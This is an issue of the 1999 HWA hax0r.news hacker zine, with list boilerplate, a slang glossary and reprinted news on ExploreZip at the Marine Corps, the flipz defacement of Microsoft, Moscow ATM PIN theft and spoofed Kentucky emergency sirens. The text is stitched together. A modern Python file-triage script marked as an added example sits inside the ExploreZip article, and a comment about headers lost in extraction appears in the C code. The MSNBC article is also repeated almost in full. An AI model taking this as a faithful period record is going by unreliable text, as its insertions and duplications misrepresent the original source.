o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..

Feedback is encouraged.
The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list.

Please do NOT:

* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s).

Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributors.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa' . ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion.

The ISN membership list is NOT available for sale or disclosure.

ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs.

@HWA

00.3 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net ..............
currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa

Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for?
never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Steven Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue.

Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed below: Some are very useful, others attempt to deny any possible attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA    - see EoA ;-)

!=      - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..)

AAM     - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL     - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one??
*CC     - 1 - Credit Card (as in phraud)
          2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC     - Chaos Computer Club (Germany)

*CON    - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC     - End of Commentary

EoA     - End of Article or more commonly @HWA

EoF     - End of file

EoD     - End of diatribe (AOL'ers: look it up)

FUD     - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;)

du0d    - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER - Read Steven Levy's HACKERS for the true definition, then see HAX0R

*HAX0R  - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?'
          2 - A tool for cutting sheet metal.
HHN     - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN     - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00     - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI - Missing on/from IRC

NFC     - Depends on context: No Further Comment or No Fucking Comment

NFR     - Network Flight Recorder (Do a websearch) see 0wn3d

NFW     - No fuckin'way

*0WN3D  - You are cracked and owned by an elite entity see pheer

*OFCS   - Oh for christ's sakes

PHACV   - And variations of same
          Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H  - hacking, hacktivist
                      C  - Cracking
                      C  - Cracking
                      V  - Virus
                      W  - Warfare
                      A  - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P  - Phreaking, "telephone hacking" PHone fREAKs ...
                      CT - Cyber Terrorism

*PHEER  - This is what you do when an ereet or elite person is in your presence see 0wn3d

*RTFM   - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass.

TBC     - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA     - To Be Arranged/To Be Announced also 2ba

TFS     - Tough fucking shit.

*w00t   - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten"
          2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf    - what the fuck, where the fuck, when the fuck etc ..

*ZEN    - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh.
     - Ed
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, what's good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway.

* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi

Folks from #hwa.hax0r.news and #fawkerz, #ninjachat and #Hackwhoress

Celeb greets to Bad Kitty! meeyeaaooow! (you can hack my root anytime) Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick

kewl sites:

+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..."
- FProphet '99

+++ When was the last time you backed up your important data?

Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh?
i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up...

==============================================================================

02.0 From the editor.
     ~~~~~~~~~~~~~~~~

    /* The header names were lost in extraction; stdio.h is the one printf() needs. */
    #include <stdio.h>

    int main(void)
    {
        printf ("Read commented source!\n\n");

        /*
         * Well here we go again, happy samhain to all the pagans out there
         * happy halloween to everyone else, if you're an uptight christian
         * then chill a little and have a happy, fun and safe halloween!
         *
         * This week we're a little thin, some of you will like this others
         * will want more of what we've been doing recently, well ya can't
         * please everyone I guess... check out the fun internet phone
         *
         * Cruciphux@dok.org
         */

        printf ("EoF.\n");
        return 0;
    }

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

03.0 Two states tangle with 'cyber terrorist'
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Multisync

http://www.abcnews.go.com/wire/US/reuters19991025_4522.html

WIRE:10/25/1999 21:24:00 ET

Two States Tangle With Alleged 'Cyber-Terrorist'

BOSTON (Reuters) - Massachusetts Monday charged a 19-year-old Missouri man with guiding young teen-agers to child pornography sites on the Internet and terrorizing a school community.

Christian Hunold of Smithville, Missouri faces four child pornography charges along with charges of disorderly conduct, disrupting a school, and threatening to commit assault.

Hunold allegedly met children from Hawthorne Brook Middle School in Townsend, Massachusetts in an online chat room and directed them to Internet sites containing pornographic images. He also allegedly sent e-mails threatening to shoot school officials and blow up the building, Massachusetts Attorney General Tom Reilly told reporters.
Hunold could be sentenced to 20 years in prison, Reilly said.

Hunold remains at his home while Missouri officials continue to investigate, said Scott Holste, a spokesman for Missouri's attorney general. Holste said officials confiscated Hunold's computer equipment Friday.

"We have investigators who are working to retrieve information off the computer. That information is going to be looked at to see how it might be addressed under Missouri law," he said.

Reilly said he hoped to send a message to Hunold and other would-be "cyber-terrorists."

"Our goal is that for anyone who does this, who disrupts a school and terrorizes children and their families and parents, there are going to be consequences," Reilly said.

Reilly and Missouri Attorney General Jeremiah Nixon said state laws on the issue were inadequate. Reilly said he planned to meet with federal lawmakers to draft a measure addressing this type of Internet crime.

@HWA

04.0 Tempest Information Made Available
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Brian Oblivion

A semi-mythical technology, Tempest, is starting to see some daylight. The cypherpunks sent out FOIA requests on TEMPEST documents and they received the first shipment on Friday. They have transcribed these documents and put them on line.

Cryptome
http://cryptome.org/nsa-reg90-6.htm

@HWA

05.0 Virus That Hit Marines Identified
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench

The virus that infected Marine Corps HQ computers at the Pentagon last Friday has been identified as Explorer.Zip. Officials have confirmed that this was not any sort of cyber attack. (Explorer.Zip has been around since June which makes one wonder how often the Marines updated their Virus definition files or if they had any protection at all.)
CNN
http://www.cnn.com/TECH/computing/9910/22/virus/

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/1025/web-usmc-10-25-99.html

CNN;

ExploreZip stings Marine Corps HQ

October 22, 1999
Web posted at: 4:55 p.m. EDT (2055 GMT)

By D. Ian Hopper
CNN Interactive Technology Editor

The worm that infected computers at the Marine Corps headquarters at the Pentagon early Friday was ExploreZip, an especially malicious virus that typically travels by e-mail, according to a Marine Corps spokesman.

Symantec Corporation told CNN that Marine personnel called a technical support line at Symantec to report the outbreak.

The outbreak affected unclassified documents, and did not impact any command or control capability, Maj. Dave Lapan said. The outbreak was attributed to a user opening an infected file attachment.

"Basically it was an inconvenience to the users who were affected. It just illustrates the hazards of opening files from unknown sources," Lapan said.

The Marine Corps has since restored all lost files from backups.

The ExploreZip worm replicates itself by mailing itself out to unread messages in Microsoft Outlook, Outlook Express and Exchange. It also searches mapped network drives and other networked computers for installations of Windows. Once found, it copies itself into the Windows directory of the remote machine, according to the Symantec AntiVirus Research Center.

The program then destroys a host of files based on file extension, specifically targeting C language code files, Microsoft Word, Excel and PowerPoint files, among others. Rather than simply deleting files - which could then be undeleted - the worm resets the file size to zero bytes, making them much more difficult to recover.

In June, an ExploreZip outbreak infected computers at many large businesses, including AT&T, Microsoft, Boeing and General Electric. The worm was first discovered in Israel, and was submitted to Symantec in June.
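The article's point about zero-byte truncation matters for clean-up: a "which files are missing" check finds nothing, because the casualties are still there with their names intact. As an added example (not from the article, Symantec or the Marine Corps), the script below walks a directory tree and reports zero-length files carrying the kinds of extensions the article says were targeted; the exact extension set is an assumption, since the text only says "among others", and the sample tree is constructed in a temp directory.

```python
"""Triage helper for an ExploreZip-style incident (added example).

The worm truncates its targets to zero bytes instead of deleting them,
so a responder needs to find files that still exist but are now empty.
This reports zero-length files whose extension is on a watch list.
"""
import os
import tempfile
from collections import Counter

# Assumed extension set: the article names the file types (C source,
# Word, Excel, PowerPoint), not the suffixes, and says "among others".
TARGET_EXTENSIONS = {".c", ".h", ".cpp", ".asm", ".doc", ".xls", ".ppt"}


def find_truncated(root, extensions=TARGET_EXTENSIONS):
    """Return sorted paths (relative to root) of zero-byte files with a watched extension."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            ext = os.path.splitext(name)[1].lower()
            if ext not in extensions:
                continue
            full = os.path.join(dirpath, name)
            try:
                if os.path.getsize(full) == 0:
                    hits.append(os.path.relpath(full, root))
            except OSError:
                # Unreadable entries (permissions, races) are skipped, not fatal.
                continue
    return sorted(hits)


def summarize(hits):
    """Count hits per extension so the blast radius is visible at a glance."""
    return dict(Counter(os.path.splitext(h)[1].lower() for h in hits))


def build_sample_tree():
    """Create a constructed sample tree: some truncated files, some healthy ones."""
    root = tempfile.mkdtemp(prefix="explorezip_triage_")
    layout = {
        "src/main.c": b"",            # hit: zero bytes, watched extension
        "src/util.c": b"int x;\n",    # healthy, has content
        "docs/report.doc": b"",       # hit
        "docs/budget.xls": b"",       # hit
        "docs/slides.ppt": b"data",   # healthy
        "notes/empty.txt": b"",       # zero bytes but not a watched extension
    }
    for rel, content in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    found = find_truncated(sample_root)
    for hit in found:
        print("zero-byte:", hit)
    print(summarize(found))
```

Point `find_truncated()` at a restored share before and after pulling from backup to confirm nothing was missed; a healthy zero-byte file in the list is a false positive to check by hand.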
It can be removed using popular anti-virus programs with updated virus definition files

-=-

FCW;

OCTOBER 25, 1999

Marines say virus incident not an attack

BY DANIEL VERTON (dan_verton@fcw.com)

The computer virus that found its way onto the network at Marine Corps headquarters in the Pentagon last week is not the result of a deliberate or sustained cyberattack, officials confirmed Friday.

Senior officials involved in intelligence and command and control at Marine Corps headquarters characterized the incident as localized and minor. Officials identified the virus as the ExploreZip worm virus. Worm viruses, such as ExploreZip, replicate themselves quickly throughout infected systems and networks and then delete files critical to the operation of various Microsoft Windows-based applications.

"We have a better-than-average system for [computer network defense] using detection systems, firewalls and virus scans," said one senior official, who spoke on condition of anonymity. "But if you get the right combination of operator or system administrator errors lined up with the right unsafe practice by a user, something like this can get on the network," the official said. "It wasn't that big of a deal, and we're not sure why it rated even a news clip."

Capt. Pete Mitchell, a Marine Corps spokesman, said an unknown type of worm virus attached to an e-mail infected the shared hard drives on three unclassified servers, hitting Microsoft Corp.-based applications particularly hard.

"While it was more of an inconvenience than anything else, it was a reminder of the hazards [associated] with opening e-mails with attachments from unknown sources," Mitchell said.

The incident raised eyebrows, however, coming as new variants of the "Melissa" virus recently have been identified throughout the country.
Melissa, which appeared in March on networks throughout government and private industry, forced the Marine Corps to shut down its base-to-base e-mail system for several days until system administrators could ensure the virus had been eliminated [FCW, March 30].

@HWA

06.0 Love sick hacker hits Microsoft hard
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Lovesick hacker hits Microsoft site

Vandalism is first known defacement of company Web page

By Mike Brunker
MSNBC

Oct. 26

Earning a footnote in the annals of computer vandalism, a lovesick hacker known as flipz on Tuesday became the first person known to have defaced one of Microsoft Corp.’s Web sites. The hacker, who also altered a handful of government Web sites in recent days, says he expects to be arrested soon. “Its (sic) all about fun till the feds bust down the door,” a message left on one of the defaced Web sites said.

THE DEFACEMENT of Microsoft’s Conference Management Server site was documented by attrition.org, a reliable computer security site that maintains an archive of hacked Web sites.

Microsoft did not respond to calls seeking comment on the attack. But a company source who spoke on condition of anonymity, confirmed that the hacker had commandeered a company-owned computer. However, the source said, the hacked machines were not part of Microsoft’s corporate network, but rather part of a “direct tap network” used by developers and partners for testing purposes. These computers are connected directly to the Internet, and are one step removed from Microsoft’s corporate network, the source said. (MSNBC is a joint-partnership between Microsoft and NBC News.)

Representatives of two government Web sites hacked by “flipz” — the Department of Veterans Affairs and the White Sands Missile Range in New Mexico — confirmed that attrition.org’s account of the vandalism of their sites was accurate.
PART LOVE NOTE, PART THREAT

On Monday, the hacker replaced Microsoft’s Conference Management Server home page, which was not accessible Tuesday morning, with a message that was part love letter and part threat, attrition.org reported.

“flipz was here and f0bic, your seksi (sic) voice helped me through the night,” it read in part before concluding with a threat against Microsoft CEO Bill Gates.

B.K. DeLong, curator of the attrition.org Web defacement archive, said research of other hacking mirror sites — which use a computer’s “screen grab” function to document vandalized Web sites — indicates that this is the first time Microsoft has been victimized.

“This is the first time that we’ve been publicly notified (about a hacking claim against Microsoft) ... and to build our mirror we borrowed mirrors from other sites,” he said.

All of the recent hacked pages were accessed through Microsoft NT servers, attrition.org said.

OTHER SITES AFFECTED?

The hack appeared to impact a series of Internet domains Microsoft maintains outside its standard corporate presence on the Net. As of Tuesday morning, at least six sites registered to Microsoft weren’t functioning, though some may have been removed prior to the hack.

While most Microsoft corporate site IP addresses start with 207, the hacked page started with 131. On Tuesday, all Microsoft sites between 131.107.65.0 and 131.107.65.20 weren’t functioning. These likely were all hosted on the same server, which apparently was offline.

The impacted Web pages appear to be conference information sites, including “icassp.microsoft.com,” “isys.microsoft.com,” and “cuai-97.microsoft.com.” Another non-functioning site was “uncertainty.microsoft.com.” The purpose of that site was not known.

A PROMINENT TARGET

Microsoft has long been a prominent target of hackers.
The 2600 Web site, the online home of a hackers’ magazine, has the Redmond, Wash., company prominently listed on a page of “Hacked Sites of the Future.” But DeLong said he wasn’t aware of any competition to break into Microsoft’s computers.

“I haven’t really heard people saying, ‘Ooh, I’m going to hack Microsoft!’ Part of it may be that they think they can’t get in or ... that they fear retribution from Microsoft,” he said.

DeLong said “flipz” first came to his attention in March, when he reported he had hacked a Web page operated by NASA’s Jet Propulsion Laboratory. The hacker added attacks on Duracell Corp. in June and People’s Bank of Connecticut in September to his resume before the recent spate of attacks, which began Wednesday.

According to attrition.org, “flipz” altered the University of California at Riverside Police Department’s Web site that day before turning to government targets, knocking off, in rapid succession, the homepages of the U.S. Army Reserve Command, the White Sands Missile Range, the U.S. Army Dental Care System, the Navy Management System Support Office, the Substance Abuse and Mental Health Services Administration and the Department of Veterans Affairs.

HACKER LOVE?

The love notes that “flipz” left on three of the defaced sites suggest that the hacker has a crush on a fellow computer intruder. A person using the hacking handle “f0bic” is a member of “Team Spl0it,” a hacking group that retaliated for the FBI’s arrest in September of alleged hacker Chad Davis by vandalizing several Web sites.

Davis, a 19-year-old Green Bay, Wis., resident, is accused of breaking into a U.S. Army computer at the Pentagon. According to a federal complaint filed at the time of his arrest, Davis is a founder and leader of the “Global Hell” hacking group, which vandalized White House, FBI and U.S. Senate Web sites earlier this year.
The FBI did not respond to a query about whether “flipz” hacking attacks were under investigation, but DeLong said the hacker expects to be arrested before long. “flipz said he doesn’t care if the feds come and get him,” DeLong said. “He’s expecting to get picked up, but he’s going to have fun while he’s waiting.” MSNBC technology writer Bob Sullivan contributed to this report. THE DEFACEMENT of Microsoft’s Conference Management Server site was documented by attrition.org, a reliable computer security site that maintains an archive of hacked Web sites. Microsoft did not respond to calls seeking comment on the attack. But a company source who spoke on condition of anonymity, confirmed that the hacker had commandeered a company-owned computer. However, the source said, the hacked machines were not part of Microsoft’s corporate network, but rather part of a “direct tap network” used by developers and partners for testing purposes. These computers are connected directly to the Internet, and are one step removed from Microsoft’s corporate network, the source said. (MSNBC is a joint-partnership between Microsoft and NBC News.) Representatives of two government Web sites hacked by “flipz” — the Department of Veterans Affairs and the White Sands Missile Range in New Mexico — confirmed that attrition.org’s account of the vandalism of their sites was accurate. PART LOVE NOTE, PART THREAT On Monday, the hacker replaced Microsoft’s Conference Management Server home page, which was not accessible Tuesday morning, with a message that was part love letter and part threat, attrition.org reported. “flipz was here and f0bic, your seksi (sic) voice helped me through the night,” it read in part before concluding with a threat against Microsoft CEO Bill Gates. B.K. 
DeLong, curator of the attrition.org Web defacement archive, said research of other hacking mirror sites — which use a computer’s “screen grab” function to document vandalized Web sites — indicates that this is the first time Microsoft has been victimized. “This is the first time that we’ve been publicly notified (about a hacking claim against Microsoft) ... and to build our mirror we borrowed mirrors from other sites,” he said. All of the recent hacked pages were accessed through Microsoft NT servers, attrition.org said. OTHER SITES AFFECTED? The hack appeared to impact a series of Internet domains Microsoft maintains outside its standard corporate presence on the Net. As of Tuesday morning, at least six sites registered to Microsoft weren’t functioning, though some may have been removed prior to the hack. While most Microsoft corporate site IP addresses start with 207, the hacked page started with 131. On Tuesday, all Microsoft sites between 131.107.65.0 and 131.107.65.20 weren’t functioning. These likely were all hosted on the same server, which apparently was offline. The impacted Web pages appear to be conference information sites, including “icassp.microsoft.com,” “isys.microsoft.com,” and “cuai-97.microsoft.com.” Another non-functioning site was “uncertainty.microsoft.com.” The purpose of that site was not known. A PROMINENT TARGET Microsoft has long been a prominent target of hackers. The 2600 Web site, the online home of a hackers’ magazine, has the Redmond, Wash., company prominently listed on a page of “Hacked Sites of the Future.” But DeLong said he wasn’t aware of any competition to break into Microsoft’s computers. “I haven’t really heard people saying, ‘Ooh, I’m going to hack Microsoft!’ Part of it may be that they think they can’t get in or ... that they fear retribution from Microsoft,” he said. DeLong said “flipz” first came to his attention in March, when he reported he had hacked a Web page operated by NASA’s Jet Propulsion Laboratory. 
The hacker added attacks on Duracell Corp. in June and People’s Bank of Connecticut in September to his resume before the recent spate of attacks, which began Wednesday. According to attrition.org, “flipz” altered the University of California at Riverside Police Department’s Web site that day before turning to government targets, knocking off, in rapid succession, the homepages of the U.S. Army Reserve Command, the White Sands Missile Range, the U.S. Army Dental Care System, the Navy Management System Support Office, the Substance Abuse and Mental Health Services Administration and the Department of Veterans Affairs.

HACKER LOVE?

The love notes that “flipz” left on three of the defaced sites suggest that the hacker has a crush on a fellow computer intruder. A person using the hacking handle “f0bic” is a member of “Team Spl0it,” a hacking group that retaliated for the FBI’s arrest in September of alleged hacker Chad Davis by vandalizing several Web sites. Davis, a 19-year-old Green Bay, Wis., resident, is accused of breaking into a U.S. Army computer at the Pentagon. According to a federal complaint filed at the time of his arrest, Davis is a founder and leader of the “Global Hell” hacking group, which vandalized White House, FBI and U.S. Senate Web sites earlier this year.

The FBI did not respond to a query about whether “flipz” hacking attacks were under investigation, but DeLong said the hacker expects to be arrested before long. “flipz said he doesn’t care if the feds come and get him,” DeLong said. “He’s expecting to get picked up, but he’s going to have fun while he’s waiting.”

MSNBC technology writer Bob Sullivan contributed to this report.

@HWA

07.0 Russian ATMs Compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench

Bank ATMs in Moscow seem to have been compromised by intruders who are stealing PIN numbers, and therefore money, from people's accounts.
It is unclear how this theft is occurring or how many people have been affected, but it is believed that the criminals are intercepting communication between the ATM and the bank.

Russia Today
http://www.russiatoday.com/frames/frames.php3?url=http%3A%2F%2Fwww.sptimes.ru%2Fcurrent%2Fpin.htm
(Requires paid registration :( )

#511, OCTOBER 22, 1999
Top Story (PIN Code Hackers Rip Off Moscow)

PIN Code Hackers Rip Off Moscow
By Brian Humphreys

MOSCOW - Hundreds of expatriates have received letters from their banks abroad warning them that their bank cards have been compromised by someone able to steal PIN codes through Moscow's ATM machines - and according to card payment system officials, the theft of PIN codes now underway in Russia *****

http://www.sptimes.ru/archive/times/511/pin.htm

@HWA

08.0 Kentucky Emergency Sirens Activated - Hacker Blamed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench

Somehow something that has absolutely nothing at all to do with hacking has been blamed on hackers. Emergency warning sirens in Boone County, Kentucky have been activated by a random prankster. This was done by duplicating the radio signals needed to activate the system. (They don't have an off switch?) This nefarious activity was blamed on the evil "hacker".

APB Online
http://www.apbnews.com/newscenter/breakingnews/1999/10/22/sirens1022_01.html

Hacker Attacks Ky. County's Weather Sirens
Activation Tones Cloned to Trigger Alarm

Oct. 22, 1999
By David Noack

BURLINGTON, Ky. (APBnews.com) -- The Boone County early warning weather system that alerts residents to a threatening storm or a tornado has been sabotaged by someone who has cloned the tones needed to trigger the alarm. Over the last few weeks, 29 sirens scattered across this rural Kentucky county have gone off, prompting a flood of phone calls to the police, they said.

"Our outdoor emergency sirens have been activated at odd hours, such as 1 a.m.
and at 7 a.m. on a recent Saturday. These did not come from our central dispatch. It had to come from a remote location, either a fixed site or a mobile [site], and we believe at this point that it came from a mobile site," said Bill Appleby, the county's emergency management director.

'Someone has a hand-held radio'

Officials believe that someone is driving around the county with the electronic equipment and activating the warning system. Officials don't know whether this is the work of a former employee or just someone using electronic gear to pluck the tones out of the air.

"They would probably not be able to do it through a personal computer. It's a radio wave transmission, so they would have to have access to our radio frequencies. What we think at this point is that someone has taped or copied our tones in some manner, and we think it's a mobile unit where someone has a hand-held radio and travels around," said Appleby, who added that sirens in neighboring Kenton County also have been set off.

He said that when dispatchers would try to turn off the sirens, another series of tones would then reactivate them. The sirens have blared for more than 20 minutes, but are only supposed to go off in three- to five-minute bursts. Appleby fears the sirens may get damaged since they are not designed to run longer than a few minutes at a time. The sirens sit atop poles and include an antenna so they can receive the activation tones from dispatchers.

Seeking an electronic footprint

The Boone County police are investigating the incidents, and the Federal Communications Commission has been notified. Appleby said that since the sirens are meant to alert residents to some kind of danger, their random activation is causing anxiety in some people. He said starting this weekend they would be trying to track the culprit making the calls.

"We are hoping to get an electronic footprint from someone who may be activating a radio, either a base or mobile, see which one of our towers activates first, and then we would know at least the general vicinity," said Appleby.

Tape-recording tones will not work

He said the sirens are tested on a monthly basis and the public is notified. It's then that the tones, using the right equipment, can be captured. Steve Makky Sr., an emergency coordinator and communications and warning officer for a Missouri emergency agency, said it's possible to buy or modify a radio that can be programmed to mimic the correct tones. But he said that activating an outdoor warning device, or OWD, is not that easy and requires some sophistication.

"Many of the OWDs have microprocessor filters that require precise-activating tone frequencies [similar to touch tones] and timing duration. The difference of one millisecond will not activate the OWD. Simply tape-recording and replaying these will usually not work," Makky said.

Expanding outdoor warning system

Makky continued: "The act usually involves transmitting on unauthorized radio frequencies and most do this on a somewhat frequent basis. Some agencies have communications specialists or agreements with ham radio operators to track down 'jammers.' Such an effort usually requires a specialized radio direction finding apparatus and prior experience using it."

Boone County's emergency management department is responsible for the planning and coordination of unified emergency response to any disaster or emergency situation in the county, dealing with severe weather, flooding, fire, explosions, power failures, riots, hazardous material incidents and any other natural or man-made emergencies. A major project of the office is the expansion of the outdoor warning system. Funding has been approved to purchase 12 additional outdoor warning sirens to be added to the existing warning sirens.
These sirens are being installed to expand the warning coverage area, especially near areas where outdoor activities take place. Activation of the sirens occurs when an actual sighting of a tornado or funnel cloud is confirmed, or when the National Weather Service issues a warning for the county. The sirens may also be activated at the discretion of the emergency management office under certain conditions or for other public emergencies.

David Noack is an APBnews.com staff writer (david.noack@apbnews.com).

@HWA

09.0 Over 24 Variants of Melissa Found With More to Come
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by turtlex

